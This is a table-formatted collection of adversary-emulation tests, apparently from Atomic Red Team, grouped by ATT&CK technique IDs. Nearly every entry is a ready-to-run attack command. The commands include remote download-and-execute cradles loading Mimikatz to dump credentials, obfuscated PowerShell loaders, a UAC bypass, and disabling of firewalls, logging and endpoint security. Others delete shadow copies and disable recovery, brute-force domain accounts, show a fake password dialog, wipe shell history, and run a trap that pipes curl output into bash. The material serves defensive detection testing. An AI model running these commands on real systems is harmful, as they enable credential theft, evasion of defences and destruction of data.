| Download Mimikatz and dump credentials | |
| powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" | |
| BloodHound | |
| Download Bloodhound and run it | |
| powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData" | |
| Obfuscation Tests | |
| Different obfuscated methods to test | |
| Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" | |
| (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) | |
| (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() | |
| Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) | |
| Mimikatz - Cradlecraft PsSendKeys | |
| Run mimikatz via PsSendKeys | |
| $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr | |
| Invoke-AppPathBypass | |
| Note: Windows 10 only | |
| Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ | |
| Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass" | |
| C:\Windows\System32\cmd.exe | |
| PowerShell Add User | |
| Using PS 5.1, add a user via CLI | |
| New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}' | |
| Powershell MsXml COM object | |
| Provided by https://github.com/mgreen27/mgreen27.github.io | |
| Powershell MsXml COM object. | |
| Not proxy aware removing cache although does not appear to write to those locations | |
| powershell.exe -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" | |
| Powershell XML requests | |
| Provided by https://github.com/mgreen27/mgreen27.github.io | |
| Powershell xml download request | |
| "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" | |
| Powershell invoke mshta.exe download | |
| Provided by https://github.com/mgreen27/mgreen27.github.io | |
| Powershell invoke mshta to download payload | |
| "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:#{url}").Exec();close()" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Account Discovery T1087 has 10 Test(s) | |
| List all accounts | |
| xxx | |
| cat /etc/passwd > #{output_file} | |
| View sudoers access | |
| xxx (requires root) | |
| cat /etc/sudoers > #{output_file} | |
| View accounts with UID 0 | |
| xxx | |
| grep 'x:0:' /etc/passwd > #{output_file} | |
| List opened files by user | |
| xxx | |
| username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username | |
| Show if a user account has ever logger in remotely | |
| xxx | |
| lastlog > #{output_file} | |
| Enumerate Groups and users | |
| utilize local utilities to identify users and groups | |
| groups | |
| id | |
| dscl . list /Groups | |
| dscl . list /Users | |
| dscl . list /Users | grep -v '_' | |
| dscacheutil -q group | |
| dscacheutil -q user | |
| Enumerate all user accounts | |
| List all accounts | |
| net user | |
| net user /domain | |
| dir c:\Users\ | |
| cmdkey.exe /list | |
| net localgroup "Users" | |
| net localgroup | |
| Enumerate all user accounts - PowerShell | |
| List all accounts with PowerShell | |
| net user | |
| net user /domain | |
| get-localuser | |
| get-localgroupmembers -group Users | |
| cmdkey.exe /list | |
| ls C:/Users | |
| get-childitem C:\Users\ | |
| dir C:\Users\ | |
| get-aduser -filter * | |
| get-localgroup | |
| net localgroup | |
| Get logged on Users | |
| List logged on users | |
| query user | |
| Get logged on users PowerShell | |
| List logged on users powershell | |
| query user | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Disabling Security Tools T1089 has 7 Test(s) | |
| Disable iptables firewall | |
| Disables the iptables firewall | |
| if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; | |
| then | |
| service iptables stop | |
| chkconfig off iptables | |
| service ip6tables stop | |
| chkconfig off ip6tables | |
| else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; | |
| systemctl stop firewalld | |
| systemctl disable firewalld | |
| fi | |
| Disable syslog | |
| Disables syslog collection | |
| if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; | |
| then | |
| service rsyslog stop | |
| chkconfig off rsyslog | |
| else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; | |
| systemctl stop rsyslog | |
| systemctl disable rsyslog | |
| fi | |
| Disable Cb Response | |
| Disable the Cb Response service | |
| if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; | |
| then | |
| service cbdaemon stop | |
| chkconfig off cbdaemon | |
| else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; | |
| systemctl stop cbdaemon | |
| systemctl disable cbdaemon | |
| fi | |
| Disable SELinux | |
| Disables SELinux enforcement | |
| setenforce 0 | |
| Disable Carbon Black Response | |
| Disables Carbon Black Response | |
| sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist | |
| Disable LittleSnitch | |
| Disables LittleSnitch | |
| sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist | |
| Disable OpenDNS Umbrella | |
| Disables OpenDNS Umbrella | |
| sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] NTFS File Attributes T1096 has 1 Test(s) | |
| Alternate Data Streams (ADS) | |
| Execute from Alternate Streams | |
| [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) | |
| [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab | |
| print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg | |
| regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat #{path}\file.txt:file.bat | |
| esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Account Manipulation T1098 has 1 Test(s) | |
| Admin Account Manipulate | |
| Manipulate Admin Account Name | |
| $x = Get-Random -Minimum 2 -Maximum 9999 | |
| $y = Get-Random -Minimum 2 -Maximum 9999 | |
| $z = Get-Random -Minimum 2 -Maximum 9999 | |
| $w = Get-Random -Minimum 2 -Maximum 9999 | |
| Write-Host HaHaHa_$x$y$z$w | |
| $hostname = (Get-CIMInstance CIM_ComputerSystem).Name | |
| $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name | |
| foreach($member in $fmm) { | |
| if($member -like "*Administrator*") { | |
| Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" | |
| Write-Host "Successfully Renamed Administrator Account on" $hostname | |
| } | |
| } | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Timestomp T1099 has 3 Test(s) | |
| Set a file's access timestamp | |
| Stomps on the access timestamp of a file | |
| touch -a -t 197001010000.00 #{target_filename} | |
| Set a file's modification timestamp | |
| Stomps on the modification timestamp of a file | |
| touch -m -t 197001010000.00 #{target_filename} | |
| Set a file's creation timestamp | |
| Stomps on the create timestamp of a file | |
| Setting the creation timestamp requires changing the system clock and reverting. | |
| Sudo or root privileges are required to change date. Use with caution. | |
| NOW=$(date) | |
| date -s "1970-01-01 00:00:00" | |
| touch #{target_filename} | |
| date -s "$NOW" | |
| stat #{target_filename} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] AppInit DLLs T1103 has 1 Test(s) | |
| Install AppInit Shim | |
| AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system | |
| reg.exe import #{file_name} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Remote File Copy T1105 has 1 Test(s) | |
| xxxx | |
| xxxx | |
| ### TODO: Not sure how to handle commands that need to be run on multiple systems | |
| # Adversary System Configuration | |
| # Ensure SSH access has been configured for an adversary account | |
| echo "This file transferred by scp" > /tmp/adversary-scp | |
| echo "This file transferred by sftp" > /tmp/adversary-sftp | |
| mkdir /tmp/adversary-rsync | |
| cd /tmp/adversary-rsync | |
| touch a b c d e f g | |
| # Victim System Configuration | |
| # Ensure SSH access has been configured for a victim account | |
| # Ensure write access for victim account to this directory | |
| mkdir /tmp/victim-files | |
| cd /tmp/victim-files | |
| # Push files to victim using rsync | |
| rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/ | |
| # Pull files from adversary using rsync | |
| rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/ | |
| # Push files to victim using scp | |
| scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/ | |
| # Pull file from adversary using scp | |
| scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file | |
| # Push files to victim using sftp | |
| sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp' | |
| # Pull file from adversary using sftp | |
| sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] File Deletion T1107 has 13 Test(s) | |
| Victim configuration | |
| Create a temporary directory and several files on the victim system for later deletion | |
| mkdir /tmp/victim-files | |
| cd /tmp/victim-files | |
| touch a b c d e f g | |
| echo "This file will be shredded" > /tmp/victim-shred.txt | |
| Delete a single file | |
| Delete a single file from the temporary directory | |
| rm -f /tmp/victim-files/a | |
| Delete an entire folder | |
| Recursively delete the temporary directory and all files contained within it | |
| rm -rf /tmp/victim-files | |
| Overwrite and delete a file with shred | |
| Use the `shred` command to overwrite the temporary file and then delete it | |
| shred -u /tmp/victim-shred.txt | |
| Victim configuration | |
| Create a temporary directory and several files on the victim system for later deletion | |
| mkdir %TEMP%\victim-files-cmd | |
| cd %TEMP%\victim-files-cmd | |
| type nul > a | |
| type nul > b | |
| type nul > c | |
| type nul > d | |
| type nul > e | |
| type nul > f | |
| type nul > g | |
| mkdir %TEMP%\victim-files-ps | |
| cd %TEMP%\victim-files-ps | |
| type nul > a | |
| type nul > b | |
| type nul > c | |
| type nul > d | |
| type nul > e | |
| type nul > f | |
| type nul > g | |
| Delete a single file - cmd | |
| Delete a single file from the temporary directory using cmd.exe | |
| del /f %TEMP%\victim-files-cmd\a | |
| Delete an entire folder - cmd | |
| Recursively delete the temporary directory and all files contained within it using cmd.exe | |
| del /f /S %TEMP%\victim-files-cmd | |
| Delete a single file - ps | |
| Delete a single file from the temporary directory using Powershell | |
| Remove-Item -path %TEMP%\victim-files-ps\a | |
| Delete an entire folder - ps | |
| Recursively delete the temporary directory and all files contained within it using Powershell | |
| Remove-Item -path %TEMP%\victim-files-ps -recurse | |
| Delete VSS - vssadmin | |
| Delete all volume shadow copies with vssadmin.exe | |
| vssadmin.exe Delete Shadows /All /Quiet | |
| Delete VSS - wmic | |
| Delete all volume shadow copies with wmic | |
| wmic shadowcopy delete | |
| bcdedit | |
| xxx | |
| bcdedit /set {default} bootstatuspolicy ignoreallfailures | |
| bcdedit /set {default} recoveryenabled no | |
| wbadmin | |
| xxx | |
| wbdadmin delete catalog -quiet | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Brute Force Credential Access T1110 has 1 Test(s) | |
| Brute Force Credentials | |
| Creates username and password files then attempts to brute force on remote host | |
| net user /domain > #{input_file_users} | |
| echo "Password1" >> #{input_file_passwords} | |
| echo "1q2w3e4r" >> #{input_file_passwords} | |
| echo "Password!" >> #{input_file_passwords} | |
| @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Screen Capture T1113 has 4 Test(s) | |
| Screencapture | |
| Use screencapture command to collect a full desktop screenshot | |
| screencapture | |
| Screencapture (silent) | |
| Use screencapture command to collect a full desktop screenshot | |
| screencapture -x | |
| X Windows Capture | |
| Use xwd command to collect a full desktop screenshot and review file with xwud | |
| xwd -root -out #{output_file} | |
| xwud -in #{output_file} | |
| Import | |
| Use import command to collect a full desktop screenshot | |
| import -window root | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Clipboard Data T1115 has 2 Test(s) | |
| Utilize Clipboard to store or execute commands from | |
| Add data to clipboard to copy off or execute commands from. | |
| dir | clip | |
| clip < readme.txt | |
| PowerShell | |
| Utilize PowerShell to echo a command to clipboard and execute it | |
| echo Get-Process | clip | |
| Get-Clipboard | iex | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Regsvr32 T1117 has 3 Test(s) | |
| Regsvr32 local COM scriptlet execution | |
| Regsvr32.exe is a command-line program used to register and unregister OLE controls | |
| regsvr32.exe /s /u /i:#{filename} scrobj.dll | |
| Regsvr32 remote COM scriptlet execution | |
| Regsvr32.exe is a command-line program used to register and unregister OLE controls | |
| regsvr32.exe /s /u /i:#{url} scrobj.dll | |
| Regsvr32 local DLL execution | |
| Regsvr32.exe is a command-line program used to register and unregister OLE controls | |
| regsvr32.exe #{dll_name} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] InstallUtil T1118 has 1 Test(s) | |
| InstallUtil uninstall method call | |
| Executes the Uninstall Method | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Automated Collection T1119 has 2 Test(s) | |
| Automated Collection Command Prompt | |
| Automated Collection | |
| dir c: /b /s .docx | findstr /e .docx | |
| for /R c: %f in (*.docx) do copy %f c:\temp\ | |
| Automated Collection PowerShell | |
| Automated Collection | |
| Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] RegSvcs/RegAsm T1121 has 2 Test(s) | |
| Regasm Uninstall Method Call Test | |
| Executes the Uninstall Method, No Admin Rights Required | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library T1121.cs | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | |
| Regsvs Uninstall Method Call Test | |
| Executes the Uninstall Method, No Admin Rights Required, Requires SNK | |
| $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' | |
| $Content = [System.Convert]::FromBase64String($key) | |
| Set-Content key.snk -Value $Content -Encoding Byte | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk T1121.cs | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe T1121.dll | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Bypass User Account Control T1122 has 1 Test(s) | |
| PowerShell UAC Bypass | |
| PowerShell EventViewer Bypass by Matt Nelson | |
| Invoke-EventVwrBypass.ps1 | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Audio Capture T1123 has 2 Test(s) | |
| SourceRecorder via Windows command prompt | |
| Create a file called test.wma, with the duration of 30 seconds | |
| SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} | |
| PowerShell Cmdlet via Windows command prompt | |
| [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) | |
| powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] System Time Discovery T1124 has 2 Test(s) | |
| System Time Discovery | |
| Identify the system time | |
| net time \\#{computername} | |
| w32tm /tz | |
| System Time Discovery - PowerShell | |
| Identify the system time via PowerShell | |
| powershell.exe Get-Date | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Remove Network Share T1126 has 2 Test(s) | |
| Remove Network Share | |
| Removes a Network Share utilizing the command_prompt | |
| net share #{share_name} /delete | |
| Remove Network Share PowerShell | |
| Removes a Network Share utilizing PowerShell | |
| Remove-SmbShare -Name #{share_name} | |
| Remove-FileShare -Name #{share_name} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Trusted Developer Utilities T1127 has 1 Test(s) | |
| MSBuild Bypass Using Inline Tasks | |
| Executes the code in a project file using. C# Example | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Netsh Helper DLL T1128 has 1 Test(s) | |
| Netsh Helper DLL Registration | |
| Netsh interacts with other operating system components using dynamic-link library (DLL) files | |
| netsh.exe add helper #{helper_file} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Install Root Certificate T1130 has 1 Test(s) | |
| Install root CA on CentOS/RHEL | |
| Creates a root CA with openssl | |
| openssl genrsa -out #{key_filename} 4096 | |
| openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename} | |
| if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ]; | |
| then | |
| cat rootCA.crt >> /etc/pki/tls/certs/ca-bundle.crt | |
| else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ]; | |
| cp rootCA.crt /etc/pki/ca-trust/source/anchors/ | |
| update-ca-trust | |
| fi | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Data Encoding T1132 has 1 Test(s) | |
| Base64 Encoded data. | |
| Utilizing a common technique for posting base64 encoded data. | |
| echo -n 111-11-1111 | base64 | |
| curl -XPOST #{base64_data}.#{destination_url} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Access Token Manipulation T1134 has 1 Test(s) | |
| Access Token Manipulation | |
| Creates a process as another user | |
| Requires Administrator Privileges To Execute Test | |
| #list processes by user, | |
| $owners = @{} | |
| gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user} | |
| get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}} | |
| #Steal Token | |
| . .\src\T1134.ps1 | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Network Share Discovery T1135 has 3 Test(s) | |
| Network Share Discovery | |
| Network Share Discovery | |
| df -aH | |
| smbutil view -g //#{computer_name} | |
| showmount #{computer_name} | |
| Network Share Discovery command prompt | |
| Network Share Discovery utilizing the command prompt | |
| net view \\#{computer_name} | |
| Network Share Discovery PowerShell | |
| Network Share Discovery utilizing PowerShell | |
| net view \\#{computer_name} | |
| get-smbshare -Name #{computer_name} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Create Account T1136 has 4 Test(s) | |
| Create a user account on a Linux system | |
| Create a user via useradd | |
| useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} | |
| Create a user account on a MacOS system | |
| Creates a user on a MacOS system with dscl | |
| dscl . -create /Users/#{username} | |
| dscl . -create /Users/#{username} UserShell /bin/bash | |
| dscl . -create /Users/#{username} RealName "#{realname}" | |
| dscl . -create /Users/#{username} UniqueID "1010" | |
| dscl . -create /Users/#{username} PrimaryGroupID 80 | |
| dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} | |
| Create a new user in a command prompt | |
| Creates a new user in a command prompt | |
| net user /add #{username} | |
| Create a new user in PowerShell | |
| Creates a new user in PowerShell | |
| New-LocalUser -Name #{username} -NoPassword | |
| net user /add #{username} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Office Application Startup T1137 has 1 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Application Shimming T1138 has 1 Test(s) | |
| Application Shim Installation | |
| This test injects a DLL into a custom application | |
| sdbinst.exe AtomicShimx86.sdb | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Bash History T1139 has 1 Test(s) | |
| xxxx | |
| xxxx | |
| cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Deobfuscate/Decode Files Or Information T1140 has 1 Test(s) | |
| Deobfuscate/Decode Files Or Information | |
| Encode/Decode executable | |
| certutil.exe -encode #{executable} file.txt | |
| certutil.exe -decode file.txt #{executable} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Input Prompt T1141 has 1 Test(s) | |
| Prompt User for Password | |
| Prompt User for Password (Local Phishing) | |
| Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html | |
| osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Keychain T1142 has 1 Test(s) | |
| Keychain | |
| ### Keychain Files | |
| ~/Library/Keychains/ | |
| /Library/Keychains/ | |
| /Network/Library/Keychains/ | |
| [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) | |
| [Keychain dumper](https://github.com/juuso/keychaindump) | |
| security -h | |
| security find-certificate -a -p > allcerts.pem | |
| security import /tmp/certs.pem -k | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Gatekeeper Bypass T1144 has 1 Test(s) | |
| Gatekeeper Bypass | |
| Gatekeeper Bypass via command line | |
| sudo xattr -r -d com.apple.quarantine #{app_path} | |
| sudo spctl --master-disable | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Private Keys T1145 has 1 Test(s) | |
| Private Keys | |
| Find private keys on the Windows file system. | |
| File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc | |
| echo "ATOMICREDTEAM" > %windir%\cert.key | |
| dir c:\ /b /s .key | findstr /e .key | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Clear Command History T1146 has 6 Test(s) | |
| Clear Bash history (rm) | |
| Clears bash history via rm | |
| rm ~/.bash_history | |
| Clear Bash history (echo) | |
| Clears bash history via rm | |
| echo "" > ~/.bash_history | |
| Clear Bash history (cat dev/null) | |
| Clears bash history via cat /dev/null | |
| cat /dev/null > ~/.bash_history | |
| Clear Bash history (ln dev/null) | |
| Clears bash history via a symlink to /dev/null | |
| ln -sf /dev/null ~/.bash_history | |
| Clear Bash history (truncate) | |
| Clears bash history via truncate | |
| truncate -s0 ~/.bash_history | |
| Clear history of a bunch of shells | |
| Clears the history of a bunch of different shell types by setting the history size to zero | |
| unset HISTFILE | |
| export HISTFILESIZE=0 | |
| history -c | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Hidden Users T1147 has 1 Test(s) | |
| Hidden Users | |
| Add a hidden user on MacOS | |
| sudo dscl . -create /Users/#{user_name} UniqueID 333 | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] HISTCONTROL T1148 has 2 Test(s) | |
| Disable history collection | |
| Disables history collection in shells | |
| export HISTCONTROL=ignoreboth | |
| ls #{evil_command} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Plist Modification T1150 has 1 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Space After Filename T1151 has 1 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Launchctl T1152 has 1 Test(s) | |
| Launchctl | |
| Utilize launchctl | |
| launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Trap T1154 has 1 Test(s) | |
| Trap | |
| After exiting the shell, the script will download and execute. | |
| After sending a keyboard interrupt (CTRL+C) the script will download and execute. | |
| trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT | |
| exit | |
| trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT | |
| [!!!!!!!!END TEST!!!!!!!] | |
